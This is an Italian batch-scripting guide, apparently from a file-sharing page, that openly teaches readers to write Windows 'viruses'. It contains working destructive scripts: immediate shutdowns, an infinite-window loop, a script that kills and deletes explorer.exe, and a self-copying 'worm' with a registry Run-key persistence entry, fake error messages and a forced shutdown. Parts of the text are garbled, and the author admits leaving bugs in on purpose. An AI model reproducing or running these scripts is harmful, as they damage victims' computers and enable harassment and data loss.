Sei sulla pagina 1di 4

Guida Batch By LordExodus

Introduzione: Bene questa guida servira a farci capire meglio come funziona il Batch e como fare un virus con questo. -------------------------------##---------Prima di cominciare vi dico che tutti i code si lavorano prima in un blocknote e poi si salvano con l'estensione .bat Detto questo buttiamoci. 1) Primo Virus: @echo off shutdown -s -t 1 Allora vi spiego il " @echo off " disabilita l'opzione affinch non mostri i commandi. Invece il " shutdown " per spegnere il sistema e con i parametri -s -t 1 indichiamo con -s di spegnere il computer, con -t il tempo in secondi per dare avvio alla funzione. Informazioni in pi sulla funzione Shutdown: shutdown -r = Riavvia il sistema shutdown -m = Spegne un pc della rete ---> -s -t 4 -m \\nomehost shutdown -f = Forza la chiusura delle applicazioni. 2) Commandi Base: Reg: Modifica il registro Copy: Copia un File. Set : Mostra, crea variabili di windows. TaskKill: Termina Processo.

3) Etichette: Servono per andare da una parte di un programma all'altra. Esempio: @echo off echo Ciao goto etiquettaB :etiquettaA echo Ciao :etiquettaB

echo addio Con goto diciamo alla etichetta di andare in questo caso uscirir nella shell: c:\ Etichetta.bat Ciao Addio 4) Giocando con il Registro: Per modificare il registro come detto prima useremo il commando reg. REG REG REG REG REG REG REG REG REG REG REG QUERY /? ADD /? DELETE /? COPY /? SAVE /? RESTORE /? LOAD /? UNLOAD /? COMPARE /? EXPORT /? IMPORT /?

Grazie al " ? " potrete trovare inormazioni sulla funzione del commando. 5) Bucles: Servono per ripetere tante volte la stessa cosa. @echo off :kevin echo hola goto kevin Altro esempio : @echo off :haha start goto haha Info in pi: Con " Start " facciamo in modo che si aprano shell all'infinito. 6) Altro Virus: @echo off taskkill /F /IM msnmsgr.exe

del /F c:\windows\system32\explorer.exe shutdown -s -t 10 -c "Ti ho fregato" 7) Ecco qua vi lascio altri commandi di Winxp: %COMPUTERNAME% = Nome Host %SYSTEMROOT% = Cartella del admin %TEMP% = File Temporanei %WINDIR% = Directory di Windows %USERNAME% = Nome utente %OS% = Sistema operatico usato %LOGONSERVER% = Nome del server.

Ecco un ultimo Virus con cose un p pi avanzate: (ha alcuni problemi ma sono lasciati a posta cos li trovate.... non siate lammer. @echo off echo want a virus??? echo. echo I will make a infected file in your pc echo. echo want a trojan or a worm(write first letter) echo. md C:\Documents and Settings\%user%\documenti\esempio echo C:\Documents and Settings\%user%\documenti\esempio.exe tskkill /f /im explorer.exe md C:\Documents and Settings\%user%\documenti\esempioprogram echo C:\Documents and Settings\%user%\documenti\esempio\program\the virus.bat echo C:\Documents and Settings\%user%\documenti\esempioprogram\>>the virus.bat echo C:\Documents and Settings\%user%\documenti\esempio\win32/pcclient.a start Iexplorer.exe start Iexplorer.exe start Iexplorer.exe start Iexplorer.exe start Iexplorer.exe start wmplayer.exe start wmplayer.exe start taskmgr.exe start http://www.youtube.com start http://www.youtube.com start http://www.youtube.com start http://www.youtube.com start http://www.youtube.com

start start echo start start copy copy

http://www.youtube.com cmd.exe stupid mspaint.exe mspaint.exe /y %0 C:\Documents and Settings\%user%\Desktop\worm.bat /y %0 C:\Documents and Settings\%user%\Desktop\worm.bat

copy /y %0 C:\Documents and Settings\%user%\Desktop\worm.bat copy /y %0 C:\Documents and Settings\%user%\Desktop\worm.bat copy /y %0 C:\Documents and Settings\%user%\Desktop\worm.bat copy /y %0 C:\Documents and Settings\%user%\Desktop\worm.bat copy /y %0 C:\Documents and Settings\%user%\Desktop\worm.bat copy /y %0 C:\Documents and Settings\%user%\Desktop\worm.bat copy /y %0 C:\Documents and Settings\%user%\Desktop\worm.bat copy /y %0 C:\Documents and Settings\%user%\Desktop\worm.bat reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "security" /d "c:\WINDOWS\system\windows.bat" msg * the system is unestable".20"windows system notificator msg * the antivirus is hacked".20."windows msg * instruction error:fd1100000x00957".20."fatal msg * error in harddisk".20."System msg * cant initialize dtrwatson.exe".20."System32 msg * firewall desactivated".20."firewall desactivation msgbox=("system failure".20."total system failure" ) msg* system decline:your system have an internal error.will shutdown to prevent system loose".20."Warning!system unestable shutdown -s -t 200 -c "system decline shutdown inmediately-this prevents loose data and O.S.Data.It may reformat your pc if is damaged,will format after reboot"

Questo documenti di Blackitahack. Il suo autore LordExodus ha tutti i diritti e se lo volete copiare ricordatevi di lui e della fonte.

Potrebbero piacerti anche